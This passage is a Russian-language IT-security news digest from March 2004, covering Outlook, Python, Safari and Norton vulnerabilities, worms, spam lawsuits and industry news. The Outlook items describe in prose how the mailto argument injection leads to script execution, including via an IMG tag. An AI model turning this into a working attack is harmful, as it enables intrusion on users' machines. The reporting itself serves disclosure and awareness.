В интерпретаторе популярного скриптового языка Python версий 2.2 и 2.2.1 обнаружена возможность удалённого переполнения буфера. Ошибка присутствует в функции getaddrinfo() и проявляется только при адресации в протоколе IPV6. Атакующий для проведения атаки должен сформировать на своём DNS IPV6 адрес специального вида для того, чтобы вызвать переполнение буфера на удаленной машине. Уязвимость обнаружил Sebastian Schmidt. Присутствует в версиях python 2.2 и 2.2.1 при включённой поддержке IPv6. Производители дистрибутивов Linux - Mandrake и Debian выпустили обновления.
Подробности - http://www.debian.org/security/2004/dsa-458

11/03/2004 13:28 Выход новых версий MS SQL Server и Visual Studio откладывается.
Компания Microsoft откладывает выпуск двух очень важных программных продуктов: СУБД SQL Server под кодовым название Yukon и среды разработки приложений Visual Studio с кодовым названием Whidbey. Ранее Microsoft обещала выпустить эти системы в течение 2004 года, но теперь в качестве срока их выхода называется первая половина 2005 года. Как сообщил изданию Internetnews представитель софтверного гиганта, задержка связана с необходимостью обеспечить наилучшее качество конечного продукта. В течение же 2004 года оба программных продукта будут проходить бета-тестирование. Первая бета-версия среды разработки Whidbey должна увидеть свет уже в первом полугодии, а вторая бета выйдет уже во второй половине года. Такой график позволит отправить окончательную версию продукта в производство в течение первой половины 2005 года, хотя окончательные сроки будут уточнены в процессе тестирования. Что касается новой версии SQL Server, то ее первая бета-версия уже доступна. Вторая же бета должна появиться в первом полугодии. Дата окончательного релиза, как и в случае с Whidbey, будет зависеть от хода тестирования. При этом в Microsoft полагают, что любые задержки оправданы, когда речь идет о качестве и безопасности конечных продуктов. Наконец, в компании подчеркивают, что задержки с выпуском Yukon и Whidbey никак не отразятся на сроках выхода в свет операционной системы Longhorn, выпуск которой намечен на 2006 год.
Подробности - http://www.internetnews.com/dev-news/article.php/3324241

11/03/2004 12:32 Подробное описание уязвимости в Outlook.
Продолжая предыдущую тему. Итак, Jouko Pynnonen из Финляндии, обнаруживший уязвимость довольно подробно описал её на своей домашней странице. Вкратце описание выглядит так. При инсталляции Outlook переключатель URL "mailto:" регистрируется в системе. При открытии URL подобного вида (на Вэб-странице, либо в почте) Outlook запускается с параметрами: OUTLOOK.EXE -c IPM.Note /m "mailto:email@address". При этом из-за криво написаннной программы Outlook (а иначе это нельзя назвать) символы кавычек ("") не фильтруются, что позволяет ввести для Аутлука дополнительные аргументы, передаваемые приложению. В том числе возможно внедрение джава-скриптов при формировании URL вида javascript:. Если при этом стандартным режимом отображения Аутлука является страница "Outlook today" внедрённый скрипт будет выполнен в зоне безопасности "Local machine". Подобная "фича" позволяет злоумышленнику загружать и выполнять любой исполняемый файл. При этом возможна довольно опасная ситуация, когда на странице на Вэб-сайте внутри тэга IMG будет ссылка на URL mailto:. При этом НИКАКИХ действий со стороны счастливого пользователя Outlook абсолютно не требуется (как-то - тыкания на ссылке левой мышой). Даже если стандартной открывающейся страницей Аутлука и не является "Outlook today", можно осчастливить жертву всё равно, применив двойной URL mailto: - первый вызывает Outlook c открытием "Outlook today", второй уже внедряет джава-скрипт. Как пишет сам Юко (если я правильно понимаю произношение его имени), M$ был уведомлен об уязвимости аж 21 июля 2003 года. Браво, Microsoft! Небывалая оперативность в латании дыр. В заключении напомним, что дыра перекрывается установкой вышедших вторых сервис-паков для Microsoft Office XP и Microsoft Outlook 2002.
Более подробно - http://jouko.iki.fi/adv/outlook.html

11/03/2004 12:04 Дефект в Outlook опаснее, чем предполагалось.
Microsoft повысила степень опасности ошибки в Outlook до самой высокой — «критической», после того как исследователь, обнаруживший уязвимость, поставил под сомнение первоначальный анализ компании. Ошибка в Outlook 2002, о которой было впервые объявлено во вторник, когда Microsoft выпустила патч, позволяет злоумышленнику использовать специальный веб-сайт для загрузки и исполнения программ в ПК жертв. Выпустив поправку, Microsoft сообщила, что нападение возможно только в том случае, если в качестве начальной страницы по умолчанию в Outlook 2002 выбрана Outlook Today. Однако финский специалист по компьютерной безопасности Юко Пиноннен, обнаруживший ошибку, предупредил компанию, что на самом деле возможности для атаки шире, и она с этим согласилась. «Уже распространив бюллетень, мы узнали, что злоумышленник может обойти ограничение Outlook Today», — сказал менеджер программы Microsoft Security Response Center Стивен Тулуз. Он подчеркнул, что выпущенная во вторник поправка предотвращает любую атаку, несмотря на то что дыра оказалась шире, чем думали. Microsoft в третий раз за последние полтора года повышает уровень опасности пробелов в защите своего ПО. В декабре 2002 года она повысила статус двух уязвимостей со «среднего» до «критического», когда обнаружившие их специалисты выразили сомнение по поводу первоначальной классификации Microsoft. Пиноннен говорит, что Microsoft не оповестила его, когда планируется выпустить патч, и не сообщила, насколько серьезной она посчитала уязвимость. «Я не знал, что проблему планируется обнародовать в этом месяце», — сказал он, добавив, что если бы его известили, он провел бы дополнительные исследования по смягчающим факторам, указанным Microsoft.
Подробности - http://zdnet.com.com/2100-1105_2-5172179.html

11/03/2004 11:42 Австралийская полиция расследует мошенничества на интернет-аукционе eBay.
Власти и полиция австралийского штата Новый Южный Уэльс предупредили интернет-пользователей об участившихся случаях обмана покупателей, пользующихся локальным сайтом онлайн-аукциона eBay, сообщает агентство AAP. По словам руководителя полиции Нового Южного Уэльса Джона Уоткинса (John Watkins), его подчиненные уже сформировали два спецподразделения для охоты за организованной преступной группой, использующей для своих целей австралийскую версию аукциона eBay. «Пользователям необходимо знать, что подавляющее большинство транзакций на eBay проходят абсолютно законно. Однако нужно быть в курсе того, что аукцион открыт и для мошенников», - заявил Уоткинс. В настоящее время на австралийском аукционе eBay зарегистрировано более миллиона пользователей. Полиция Австралии занимается расследованием пока лишь двух случаев мошенничества. Власти страны не исключают возможности экстрадиции преступников в США, в случае, если среди потерпевших окажутся американские граждане. «Мы были бы очень рады использовать такой вариант, поскольку наказания за компьютерные преступления в США значительно жестче», - пояснила представительница полиции. По ее словам, за последний год жертвами мошенников в Новом Южном Уэльсе стали более 600 пользователей eBay. В большинстве случаев потерпевшие намеревались приобрести на аукционе ноутбуки, аудиоаппаратуру и цифровые камеры.
Источник - http://www.viruslist.com

11/03/2004 10:57 Американские провайдеры приступили к массовому удушению спамеров.
Четыре крупнейших американских IT-компании - Microsoft, AOL, Earthlink и Yahoo - объединили усилия в борьбе со спамерами, сообщает BBC News. Они подали шесть исков против сотен компаний, занимающихся массовой рассылкой почтовых сообщений в Сети. Как заявили представители провайдеров, среди лиц и организаций, против которых поданы иски, наиболее крупные американские спамеры, в их числе Дэвис Вольфгаг Хоук (Davis Wolfgang Hawke) из Массачусетса (Massachusetts), который также известен под именами Дейв Бриджер (Dave Bridger), и Брэден Бурнивал (Braden Bournival) из Нью-Гемпшира (New Hampshire). Microsoft, AOL, Earthlink и Yahoo подали исковые заявления в суд на основании федерального закона США, ограничивающего распространение нежелательных почтовых сообщений рекламного характера в Интернете. Этот закон, принятый Конгрессом США в декабре прошлого года, получил название CAN_SPAM Act, он предусматривает наказания в виде крупных денежных штрафов и тюремного заключения для нарушителей - частных лиц и компаний, рассылающих рекламные письма людям, которые уже заявили о нежелании получать почту подобного рода. Суммы штрафов могут достигать миллиона долларов, а срок тюремного заключения для злостных спамеров - пяти лет. Тем не менее, закон разрешает рассылку рекламных предложений в том случае, если не будут нарушены основные требования к подобным письмам. В числе прочего спамерам запрещается: фальсификация обратного адреса, маскировка поля "Тема", автоматический перебор комбинаций букв с целью выявления действующих адресов, попытки обойти антиспамерские фильтры. "Конгресс предоставил нам необходимый законодательный инструмент для того, чтобы преследовать спамеров, и мы не замедлили им воспользоваться", - сказал Рендел Бо (Randall Boe), юрист AOL. По информации некоммерческой организации Spamhaus Project, которая выслеживает и определяет самых крупных мировых спамеров, до 90 процентов нежелательных сообщений в Интернете рассылают 200 известных спамерских групп.
Подробности - http://news.bbc.co.uk/2/hi/technology/3499230.stm

11/03/2004 10:21 Компьютерная преступность - информация для размышления.
Центр исследования компьютерной преступности опубликовал аналитический отчет о криминальной активности в Интернете. Цифры показывают увеличение количества попыток взлома и Интернет-мошенничества. Интернет-преступления становятся все более частыми и в Украине по причине внедрения новых форм Интернет-расчетов и электронной коммерции. Изучение субъекта преступной деятельности в сфере использования компьютерных технологий, показало, что основными целями и мотивами компьютерных преступлений выступают корысть - 57,3%, хулиганские побуждения - 18,3%, месть - 9,2%, коммерческий шпионаж, саботаж или диверсия - 10,6%. Компьютерные преступления в 5 раз чаще совершаются мужчинами. Большинство субъектов преступления имеют высшее или неоконченное высшее техническое образование (62,5%), а также иное высшее или неоконченное высшее образование (19,2%). Проведенные исследования показали, что возраст 31% лиц на момент совершения компьютерного преступления не превышал 20 лет, 55% - от 20 до 40 лет и 14% лиц имели возраст более 40 лет. Другой интересной особенностью стали данные о специальном субъекте из числа персонала, который по своим функциональным обязанностям или занимаемой должности имел непосредственный доступ к работе компьютеров и компьютерных систем. Только в 6% случаев у злоумышленников не было прямого отношения к организации, против которой осуществлялась или планировалась противоправная деятельность, в 94% случаев компьютерные правонарушения были совершены служащими этих организаций и компаний. Процесс интенсивного внедрения IT-технологий на основе Интернет, послужил одной из причин возникновения новых виртуальных транснациональных криминальных групп, которые в своих преступных целях широко используют возможности глобальной информационной сети. Все больше признаков свидетельствуют о том, что применительно к компьютерной преступности можно говорить о ее связях с организованной преступностью.
Подробнее - http://www.crime-research.ru/news/2004/03/1001.html

10/03/2004 13:38 Предварительный обзор Service Pack 2 для XP.
Ещё одна статья посвящённая обзору улучшений в плане безопасности системы, которые ожидаются в грядущем втором сервис-паке для операционной системы Windows XP. Рассмотрены изменения, которые могут произойти во встроенном файрволле, который будет являться значительно улучшенной версией нынешнего ICF, рассмотрены улучшения в печально известной службы RPC DCOM, вводимая "песочница" кучи (heap), назначение которой - предотвратить переполнение кучи, являющееся традиционной причиной переполнения буфера (вернее, одним из путей переполнения буфера). Рекомендуется ознакомиться.
Статья - http://www.unixwiz.net/techtips/xp-sp2.html

10/03/2004 13:17 "Эшелон" - самая лучшая шпионская сеть?
На сайте ИноСМИ.Ru опубликована довольно интересная статья под названием "Эшелон" - самая лучшая шпионская сеть?", являющаяся переводом статьи из "The Washington Times". По сути, статья вкратце описывает саму систему "Эшелон" и принципы её функционирования. Завершается на довольно "оптимистичной" ноте: "Текущей реальностью системы "Эшелон" является то, что она завалена огромными объемами электронных данных, однако не располагает достаточным количеством специалистов для их обработки в режиме "реального времени". Правительства западных стран для решения проблемы вкладывают деньги в новые компьютеры и новое программное обеспечение, однако такое технологическое решение является непродуманным, и впоследствии может обернуться еще большими проблемами". ;))
Cтатья - http://www.inosmi.ru/print/208199.html

10/03/2004 12:05 Очередная тройка бюллетеней от Microsoft.
По недавно сложившейся традиции выпускать патчи пачками (почти каламбур) Microsoft "обрадовала" поклонников своей операционной системы очередной тройкой бюллетеней по безопасности, носящих номера - MS04-008, MS04-009, MS04-010. Итак, по порядку. Первый бюллетень констатирует наличие уязвимости в Windows Media Services, которая может привести к DoS. Уязвимость присутствует только в ОС Windows 2K Server и связана с механизмом переключения компонентами службы Windows Media services TCP/IP-соединений (порты 7007, 7778) - т.е. возможна удалённая атака. Остальные версии ОС Windows (в том числе и Win2K Professional) уязвимости (по словам M$) не подвержены. Выпущено обновление, которое настоятельно рекомендуется скачать. Второй бюллетень (MS04-009) посвящён уязвимости в Microsoft Outlook, наличие которой позволяет выполнить произвольный код в лоакльной зоне безопасности (Local Security Zone). Из-за некорректной обработки параметра "mailto" возникает возможность внедрения кода URI в поле "mailto" c дальнейшим выполнением внедрённого кода сценария. Уязвимости подвержены Microsoft® Office XP и Outlook 2002. Выпущены соответствующие обновления - в том числе и SP3 для Office XP! И, наконец, третий бюллетень посвящён уязвимости в службе Microsoft MSN Messenger. Наличие этой уязвимости позволяет удалённому злодею загрузить произвольные локальные файлы с машины жертвы при помощи специально сформированного пакета MSN Messenger. Уязвимости подвержены версии Microsoft MSN Messenger 6.0/6.1, для которых выпущены обновления. М-да... Не даёт расслабиться своим адептам детище Билла Гейтса.
MS04-008 - http://www.microsoft.com/technet/security/Bulletin/MS04-008.mspx
MS04-009 - http://www.microsoft.com/technet/security/Bulletin/MS04-009.mspx
MS04-010 - http://www.microsoft.com/technet/security/Bulletin/MS04-010.mspx

10/03/2004 11:32 Windows и Linux столкнулись у кассы.
В своей борьбе Windows и Linux вплотную приблизилась к кассе — в буквальном смысле. Две операционные системы, соперничающие на рынке серверов и в меньшей степени на рынке настольных ПК, сражаются также за место внутри терминалов point-of-sale, компьютеризованных кассовых аппаратов, устанавливаемых на выходе из торговых залов. Согласно отчету IHL Consulting Group, в 2003 году в Северной Америке в подавляющем большинстве продаваемых систем этого типа применялись те или иные версии Microsoft Windows, однако объемы продаж POS-терминалов под Linux росли несколько быстрее. Продажи систем под Windows 2000 или XP выросли на 13%, и теперь на их долю приходится 54% общего объема поставок. В целом POS-терминалы с операционными системами Microsoft (исключая аппараты на базе DOS) занимают 70% рынка. Однако конкурент с открытым исходным кодом тоже делает успехи. Поставки POS-терминалов под Linux выросли за год на 19%. По мнению консалтинговой фирмы, рост был бы еще выше, не сдерживай его такие факторы, как отсутствие некоторых драйверов и угроза судебного преследования со стороны SCO Group.
Подробнее - http://zdnet.com.com/2100-1104_2-5171456.html

10/03/2004 11:10 В ЕС принят новый закон против пиратов.
Во вторник, 9 марта, Европейский парламент большинством голосов принял новый закон, направленный на борьбу с пиратством. Директива по контролю над соблюдением прав на интеллектуальную собственность (Intellectual Property Rights Enforcement Directive, IPRED) изначально была предложена Жаннели Фурту, супругой главы звукозаписывающего лейбла Vivendi Universal Жана-Рене Фурту. Первый вариант законопроекта, направленный на рассмотрение депутатов, предполагал введение ряда дополнительных мер для борьбы с изготовителями поддельной продукции самых разнообразных сортов - от производителей поддельных футбольных маек и дамских сумочек до профессиональных пиратов, тиражирующих аудио- и видеопродукцию. При этом компании, чьи права на интеллектуальную собственность были нарушены, могли требовать от полиции проведения обысков в домах подозреваемых, конфискации имущества и заморозки банковских счетов. Однако критики тут же высказали опасения, что директива ЕС будет широко применяться владельцами копирайта для борьбы с пользователями файлообменных сетей. Более того, новый закон даже начали сравнивать с Актом о защите авторского права в цифровую эпоху (DMCA), которым так часто прикрывается Ассоциация звукозаписывающих компаний в США. В результате, в ходе дебатов в директиву IPRED были внесены поправки, определяющие, кого именно могут преследовать обладатели прав на интеллектуальную собственность, и какие меры могут применяться в отношении пиратов. Хотя можно предположить, что теперь борьба с пиринговыми сетями в Европе разгорится с такой же силой, как и в Соединенных Штатах.
Подробности - http://news.bbc.co.uk/2/hi/technology/3545839.stm

10/03/2004 10:25 8 марта хакер TimeOut вывел из строя 500 индийских сайтов.
Около 500 сайтов индийских компаний оказались закрыты 8 марта в результате хакерской атаки, сообщает сайт газеты The Hindu. Преступник сумел воспользоваться брешью в защите веб-сервера и удалить данные с заглавных страниц ресурсов. В результате инцидента большинство ресурсов компаний, расположенных в городах Карнатака, Тамиль Наду и Керала, оказалось недоступным до конца дня. По результатам предварительного расследования стало ясно, что хакер, назвавший себя TimeOut, сумел обойти защиту веб-сервера с IP-адресом 207.36.16.235 и вывел из строя около 500 сайтов. Администраторы атакованных ресурсов разместили предупреждения об отказе работы сайтов в связи с проведением аварийных мероприятий.
Источник - http://www.viruslist.com

9/03/2004 17:04 Уязвимость в Safari.
Cообщается о наличии уязвимости в браузере Safari, который присутствует в ОС MacOSX. Уязвимость присутствует в механизме обработки javascript движком браузера, в частности в механизме размещения массивов. Существует возможность вызвать DoS из-за ошибки сементации при задании очень большого массива (array) и записи в него числа. В некоторых случаях возникает возможность выполнения произвольного кода. Уязвимы версии Safari =< 1.2. В версиях >= 1.2.1 уязвимость убрана. В браузере Konqueror уязвимость не обнаружена. На странице описания приведены тестовые страницы для проверки уязвимости.
Подробности - http://www.insecure.ws/article.php?story=2004021918172533

9/03/2004 15:37 Выход Trustix 2.1.
Выпущен второй релиз второй ветви довольно популярного дистрибутива Linux под названием Trustix (полное название - Trustix Secure Linux) - небольшой дистрибутив Linux для серверов с усиленной защитой и стабильностью. Дистрибутив получил название "Horizon". Основное назначение нового релиза - улучшение стабильности. Также были по традиции добавлены новые версии популярных программ - Samba 3.0.2, IBM's stack protector, поддержка журналируемой файловой системы XFS, Perl 5.8.3, Postfix 2.0.18 etc.
Подробости - http://www.trustix.org

9/03/2004 14:45 Adobe вводит штрихкод в PDF-формы
Компания Adobe Systems намерена дополнить свои электронные формы новыми возможностями по вводу штрихкодов в документы на основе формата PDF (portable document format). Технология, анонсированная в понедельник, позволит ускорить обработку форм, предназначенных для печати. В числе ее ранних сторонников Налоговое управление США (IRS), которое в этом году собирается экспериментировать с добавлением штрихкодов в ряд налоговых PDF-документов. Adobe объявила также о выпуске опытной версии Adobe Designer, анонсированного в прошлом году нового продукта для создания форм, совместимых с PDF и XML (Extensible Markup Language). Сегодня электронные формы – ключевое, стратегическое направление для Adobe, которая старается превратить формат PDF, ставший общеупотребительным для электронного обмена документами, в гибкий контейнер для обмена деловой информацией. Одно из главных отличий продуктов Adobe от конкурентов, предлагающих чисто электронные формы, в частности Microsoft InfoPath, заключается в том, что PDF воспринимает как цифровые, так и печатные материалы. Новые функции поддержки штрихкода опираются на растущие возможности по введению интерактивности в PDF-формы. Чтобы добавлять в документы поля штрихкода, дизайнеры смогут использовать Adobe Designer или готовящиеся плагины для Acrobat Professional, пояснил разработчик новых функций Дэн Баум.
Источник - http://www.zdnet.ru

9/03/2004 14:19 Сайт SCO Group возобновил работу после атаки червя Mydoom.
Сайт компании SCO Group, закрывшийся в результате DDoS-атаки в конце января, возобновил свою работу, сообщает ZDNet. Работа веб-ресурса была парализована в результате эпидемии интернет-червя Mydoom. Заложенная в черве функция предусматривала проведение атаки на сайт SCO в период с 1 по 12 февраля. После 12 февраля нападение должно было прекратиться, но из-за большого количества неверно настроенных дат в компьютерах пользователей атака продолжалась значительно дольше. По этой же причине начало акции состоялось на 16 часов раньше ожидаемого срока. Масштаб DDoS-атаки привел экспертов SCO по безопасности в замешательство: через несколько часов после ее начала веб-ресурс компании оказался полностью парализован. Для поддержки пользователей пришлось в срочном порядке открыть альтернативный сайт. По данным экспертов финской компании F-Secure, SCO пыталась возобновить работу своего сайта 27 февраля, то есть спустя 15 дней после официального окончания атаки. Тем не менее, через 30 минут после открытия ресурса администраторам вновь пришлось его закрыть. Полностью работа сайта www.sco.com возобновилась 5 марта, однако в течение двух последующих дней в работе ресурса дважды возникали кратковременные сбои.
Подробности - http://zdnet.com.com/2100-1105_2-5171499.html

9/03/2004 13:09 Китай вводит закон против Microsoft.
Годами Китай боролся с монополией софтверного гиганта. В Поднебесной пытались разработать собственное программное обеспечение, апеллировали к патриотизму потребителей. Теперь в ход пошла Фемида. В соответствии с новым законом, который огласят летом, для правительственных учреждений будет установлен минимальный процент на покупку ПО, произведенного в Китае. Это очень серьезно для страны, где государственная доля составляет четвертую часть рынка программного обеспечения, который оценивается в 30 млрд. долларов. Пока неизвестно, насколько это будет "минимальный" процент: некоторые источники утверждают, что он достигнет 70%. Однако ясно одно - Linux будет в прибыли. "Когда закон вступит в силу, Linux получит хороший кусок рынка", - объясняет председатель Китайской Лаборатории, независимой консалтинговой фирмы. - "Естественно, больше всех пострадает Microsoft ". Легендарная корпорация не ответила на запросы о комментарии. Однако стоит отметить, что компания активно ухаживала за Китаем. В прошлом ноябре Стив Балмер посетил Поднебесную и подписал соглашение с министерством образования о предоставлении 10 миллионов долларов на продвижение компьютерных классов в школах.
Источник - http://www.runet.ru

9/03/2004 12:11 Шпионы среди нас.
По последней статистике, каждый двадцатый компьютер в интернете заражён шпионскими программами, который могут вести запись действий пользователя и запускать рекламные поп-апы, сообщает "Вебпланета". Шпионский софт представляет собой реальную угрозу для безопасности. Так называемое «spyware» обычно поставляется в комплекте с популярными бесплатными программами, например, с файлообменными или музыкальными. Во время их установки незаметно инсталлируется дополнительный софт. Он может быть даже упомянут мелким шрифтом в пользовательском соглашении, которое обычно никто не читает. Шпионские программы могут записывать все нажатия клавиш на компьютере или вести журнал работы в интернете с целью маркетингового исследования. Некоторые программы изменяют настройки браузера таким образом, что он автоматически загружает определенные сайты, а самые злостные представители класса «spyware» могут даже вносить изменения в системный реестр, так что их невозможно удалить без профессионального антивируса или специальной программы. Компьютерные специалисты из Вашингтонского университета разработали программу, которая анализирует сетевой трафик и способна идентифицировать активность четырех самых популярных шпионских программ: Gator, Cydoor, SaveNow и eZula. Программа разрабатывалась с научной целью, чтобы проверить, как много зараженных машин сейчас работают в сети. Учёные проанализировали трафик в сети студенческого кампуса и определили, что 5,1% всех подключенных компьютеров генерируют этот паразитный трафик. В целом по университету 69% департаментов и офисов имеют в своём составе хотя бы один заражённый компьютер. Всего было исследовано 31303 компьютеров, подключенных к интернету. Результаты работы опубликованы в научном журнале New Scientist.
Подробности - http://www.newscientist.com/news/news.jsp?id=ns99994745

9/03/2004 11:48 Недельный отчет о вирусах от Panda Software.
Опубликован традиционный еженедельный отчёт о вирусах Panda Software. На прошедшей неделе было зафиксировано особенно много вирусов и атак. Это является результатом кибервойны между несколькими авторами вирусов, создания которых уничтожали друг друга. В отчёте описываются: различные модификации червя Bagle (9 версий), червя Netsky (5 версий), две версии Mydoom (G и H) и червь Nachi.E, особенностью которого является удаление червей Mydoom и Doomjuice.
Отчёт - http://www.viruslab.ru/press/index.php?go=show&num=253

9/03/2004 10:34 Новый вирус маскируется под обновление от Microsoft.
Сразу несколько антивирусных компаний сообщили о появлении во Всемирной сети новых модификаций вредоносных программ Sober и Netsky. Данные черви, напомним, распространяются по электронной почте в виде вложений и представляют угрозу исключительно для пользователей операционных систем Microsoft Windows. Как сообщают сотрудники фирмы Symantec, новый вариант вируса Sober, получивший индекс "D", маскируется под обновление от Microsoft. Заголовок и имя вложения выбираются произвольным образом, в тексте послания говорится, что присланный файл якобы устраняет опасную дыру в Windows, через которую на ПК может проникнуть вирус MyDoom. После неосторожного запуска файла пользователем компьютера Sober.D проверяет наличие на машине своих ранних модификаций. В случае, если ПК еще не заражен, червь копирует себя в системный каталог и регистрируется в ключе автозапуска реестра ОС. Далее на экран выводится надпись: The patch has been successfully installed ("Заплатка успешно установлена"). Если компьютер уже инфицирован, вирус сообщает, что установка патча не требуется. По классификации Symantec, вредоносная программа имеет средний уровень опасности. Кроме того, в Symantec зафиксировали начало распространения одиннадцатой модификации червя Netsky. Вариант Netsky.K практически ничем не отличается от своих предшественников и, как и прежде, пытается удалить с компьютера вирус MyDoom.
Подробности - http://securityresponse.symantec.com/avcenter/venc/data/w32.sober.d@mm.html

9/03/2004 10:06 Сколько стоят компьютерные вирусы?
Владивостокский школьник пытался торговать через Интернет компьютерными вирусами. Как сообщается на информационном сайте отдела «К» Приморского края, первым и последним его покупателем оказался сотрудник отдела по борьбе с преступлениями в сфере высоких технологий УВД края. В начале года внимание сотрудников этого отдела (отдел "К") привлекло объявление на одном из приморских Интернет-сайтов: некий молодой человек публично предлагал всем желающим приобрести диски с компьютерными вирусами и хакерскими программами. Поражала настойчивость продавца нелегального товара: сообщение появлялось на сайте ежедневно. За каждый диск с вредоносными программами он просил всего каких-то 100 рублей. 27 января 2004 года податель объявления, старшеклассник одной из школ Владивостока, встретился с первым покупателем. Проверив купленный диск, специалисты обнаружили на нем "эпидемически" опасную подборку: 320 различных вирусов и программ для взлома паролей, проникновения в чужие компьютеры, уничтожения и блокирования находящейся в них информации. Согласно статье 273 УК РФ, за распространение таких программ грозит нешуточное наказание – до трех лет лишения свободы со штрафом до 200 тысяч рублей. Но, видимо, несовершеннолетний хакер по своей молодости не подозревал об этом. Как не догадывался и о том, что с самого начала попал в поле зрения специальной правоохранительной структуры. На повторную встречу с покупателем парень согласился без раздумий и 6 февраля принес в условленное место еще три диска с вирусами. Факт незаконной продажи был зафиксирован, а незадачливый торговец задержан оперативниками. Новые диски отличались от первого тем, что, помимо большого архива классических вирусов, "червей" и всяких хакерских штучек, на них находилось еще и несколько так называемых конструкторов, с помощью которых можно самим создавать вирусы и задавать им различные действия. По словам задержанного, все эти вредоносные программы он просто скачивал с Интернета и записывал на диски. То есть оказался вовсе не очередным гениальным хакером, а всего лишь предприимчивым и не в меру самоуверенным пользователем. Впрочем, отвечать за свои действия ему придется в любом случае.
Источник - http://www.crime-research.ru

8/03/2004 11:51 Bluetooth 1.2 пошел в народ.
Стало известно о выпуске сразу двух устройств, поддерживающих интерфейс Bluetooth 1.2, стандартизация которого прошла в ноябре прошедшего года. Так компания Fujitsu-Siemens начала отгрузку ноутбуков Fujitsu LifeBook S7010 с интегрированным модулем Bluetooth 1.2, а компания Ericsson сертифицировала встраиваемый модуль Bluetooth 1.2. В новой спецификации также введена изначально планировавшаяся, однако только сейчас реализованная технология адаптивной смены несущей частоты (Adaptive Frequency Hopping – AFH), позволяющей более эффективно работать в одном частотном диапазоне с устройствами, работающими на той же частоте в стандартах IEEE 802.11b и IEEE 802.11g. Также небесполезной окажется возможность более быстрого поиска находящихся в ближайшем окружении Bluetooth-устройств.
Источник - http://www.mobile-review.com

8/03/2004 11:24 Проект FreeS/WAN будет закрыт.
После пяти лет разработки проект FreeS/WAN будет закрыт, cообщает linux.org.ru. Так решили разработчики, считая, что цели, поставленные организаторами проекта недостижимы. Первая цель (создание зрелой IPsec VPN-реализации для Linux) безусловно достигнута. Но следующая цель (обезопасить Интернет с помощью повсеместного внедрения opportunistic encryption) не встретила поддержки у пользователей. Именно по этой причине финансирование проекта прекращено. В анонсе не упоминается о том, что фактически FreeS/WAN вытеснен из мейнстрима в ядре 2.6, но и без этого понятно, что истинная цель проекта уже не достижима. Оффициальный сайт и форумы продолжат работу, код будет доступен. Также будет выпущена последняя версия 2.0.6, в которой улучшат KLIPS-патчи для ядра 2.6.
Подробности - http://www.freeswan.org/ending_letter.html

8/03/2004 11:12 Евросоюз: Оставьте интернет в покое!
Если правительствам позволят наложить лапу на интернет, это будет самой тяжелой ошибкой со времен изобретения правительства. Как полагает Лучио Станца (Lucio Stanca), глава итальянского министерства по изобретениям и технологиям, заявил, что интернет смог опутать земной шар своей паутиной лишь потому, что все эти годы государства не вмешивались в дела телекоммуникационных компаний и пользователей и позволяли этому организму свободно развиваться, не тормозя и не подстегивая его рост. По мнению господина Станцы, будет лучше всего, если правительства оставят все, как есть: «правительство может вторгаться только в том случае, если на кон будут поставлены принципиальные политические вопросы, но государство не должно [совать свой нос] в его развитие». Агентство Reuters цитирует итальянского министра в свете относительно недавней инициативы ряда беднейших стран третьего мира, возжелавших наложить руки на рычаги управления интернетом, отобрав его у ICANN и передав в юридическую компетенцию ООН. Станца своим выступление дал понять, что в ходе очередного «столкновения цивилизаций» Европа по-прежнему будет поддерживать ICANN.
Источник - http://www.internet.ru

8/03/2004 10:38 Microsoft планирует еще одно обновление Windows.
В пятницу Microsoft подтвердила свое намерение обновить серверную ОС до выхода следующей капитальной версии Windows, но мало что рассказала о содержании этой промежуточной версии ПО. Впервые об обновлении, планируемом до выхода Longhorn, упомянул Билл Гейтс в опубликованном в понедельник 1 марта интервью CNET News.com. Софтверный гигант говорит, что детали апгрейда все еще обсуждаются. «Форма, которую он примет, еще не определена, как и время выпуска и название, — сказал старший директор отделения Windows Server Group Джефф Прайс. — Можно считать это развитием Windows Server 2003». Этими комментариями Microsoft оставила широкое поле для домыслов о том, что же она готовит. Возможно, компания просто соберет воедино разнообразные поправки и сервисные пакеты, а может быть внесет в ОС более существенные изменения — например, добавит поддержку некоторых функций, планируемых в Longhorn. Windows Server 2003 Microsoft выпустила в апреле прошлого года. Недавно Microsoft сообщила также, что она готовит обновление к настольным версиям Windows ХР, которое выйдет до Longhorn. Этот проект, называемый Windows XP Reloaded, предусматривает несколько усовершенствований текущей версии Windows. Между тем срок выпуска Longhorn становится все более неопределенным. Сначала Microsoft говорила, что операционная система выйдет в 2005 году, но затем перестала называть эту дату, повторяя лишь, что продукт выйдет тогда, когда будет готов. Аналитики предполагали, что это произойдет в 2006 году, но теперь некоторые считают, что это может произойти еще позже. Microsoft признала, что в какой-то момент ей придется обновить свою серверную ОС, чтобы она могла взаимодействовать с ПК под Longhorn, где в числе прочих серьезных изменений будут новая файловая система и механизм отображения информации. Однако произойдут ли эти изменения в планируемом обновлении, не известно. «Решение по этому поводу еще не принято», — сказал Прайс.
Подробнее - http://zdnet.com.com/2100-1104_2-5170946.html

7/03/2004 20:53 Уязвимость в Norton Anti-Virus.
Уязвимость обнаружена в Symantec's Norton Anti-Virus (версия 2002, возможно и другие). Локальный пользователь или вирус может создать файл или каталог, который не будет проверен антивирусом. Локальный пользователь может создать файл или каталог с именем, содержащим 1-31 ASCII символы, например ‘!’, чтобы аварийно завершить работу Norton Anti-Virus при попытке ручного сканирования этой папки или файла. Уязвимость не влияет на фоновое сканирование. Выпущен эксплоит.
Подробности - http://www.securitylab.ru/43420.html

7/03/2004 18:25 Список рассылки по SELinux.
В рамках проекта Fedora, который поддерживается одним из известнейших разработчиков дистрибутива Linux - RedHat Inc. организиван список рассылки, посвящённый различным аспектам проекта SELinux, цель которого - значительное укрепление безопасности ОС Linux. Напомним, что различные механизмы защиты SELinux включены в дистрибутив Fedora Core 1, вышедший в ноябре прошлого года, а также в новую стабильную ветку ядра Linux - 2.6.
Подробности - http://www.redhat.com/mailman/listinfo/fedora-selinux-list

7/03/2004 17:43 Проект MD5CRK.
